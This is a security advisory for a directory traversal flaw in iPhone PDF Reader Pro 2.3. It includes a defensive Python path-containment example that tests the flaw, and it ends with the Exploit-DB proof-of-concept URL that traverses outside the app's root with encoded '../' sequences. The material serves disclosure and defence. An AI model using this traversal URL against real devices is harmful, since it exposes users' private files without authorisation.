Vendor: iPhone PDF Reader Pro
By: Khashayar Fereidani
CVSS: 7.5 (HIGH)
Type: Directory Traversal
CWE: 22
Product Name: iPhone PDF Reader Pro
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: Not available
Related CWE: Not available
CPE: Not available
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iPhone 4 (iOS 4.0.1)

iPhone PDF Reader Pro 2.3 Directory Traversal

A directory traversal vulnerability was discovered in iPhone PDF Reader Pro 2.3. It allows an attacker to access files and folders outside the application's root directory. The vulnerability was tested on an iPhone 4 running iOS 4.0.1 and was rated high risk.

Mitigation:

The application should be configured to only allow access to files and folders within the application's root directory.
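
One way to implement this containment check, as an added example that is not part of the original advisory or the application's code: the request path is decoded once, resolved, and accepted only if it stays under the served directory. The function names and the constructed directory layout (`Documents`, `Documents-private`) are assumptions for illustration.

```python
import os
import tempfile
from urllib.parse import unquote


class PathOutsideRoot(Exception):
    """Raised when a request path resolves outside the served directory."""


def resolve_request_path(root: str, request_target: str) -> str:
    """Map an HTTP request target to a file path confined to `root`."""
    root_real = os.path.realpath(root)
    # Decode exactly once, before the check: "%2f" becomes "/" here, so the
    # check sees the same path the filesystem lookup will see.
    decoded = unquote(request_target.split("?", 1)[0])
    if "\x00" in decoded:
        raise PathOutsideRoot("NUL byte in path")
    # Strip leading slashes so os.path.join cannot discard the root.
    relative = decoded.lstrip("/")
    candidate = os.path.realpath(os.path.join(root_real, relative))
    # realpath collapses ".." and follows symlinks; compare whole components,
    # not string prefixes ("Documents-private" must not pass for "Documents").
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathOutsideRoot(request_target)
    return candidate


def is_allowed(root: str, request_target: str) -> bool:
    try:
        resolve_request_path(root, request_target)
        return True
    except PathOutsideRoot:
        return False


def demo() -> dict:
    """Run the check against a constructed document directory."""
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "Documents")
        os.makedirs(os.path.join(root, "books"))
        os.makedirs(os.path.join(base, "Documents-private"))
        targets = [
            "/books/",                                      # inside root
            "/books/../",                                   # resolves to root itself
            "//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/",  # pattern from the advisory
            "/..%2fDocuments-private/",                     # sibling sharing a prefix
            "/%252e%252e%252f",                             # stays a literal name if decoded once
        ]
        return {t: is_allowed(root, t) for t in targets}
```

The double-encoded case is accepted only because the result is a literal file name under the root; any later component that decodes the path a second time would need the same check applied after its own decoding.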
Source

Exploit-DB raw data:

----------------------------------------------------------------
Software : iPhone PDF Reader Pro 2.3
Type of vulnerability : Directory Traversal
Tested On : iPhone 4 (IOS 4.0.1)
Risk of use : High
----------------------------------------------------------------
Program Developer : http://itunes.apple.com/us/app/pdf-reader-pro/id300298606?mt=8
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

URL For Explore / Files And Folders : http://IP:8080//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/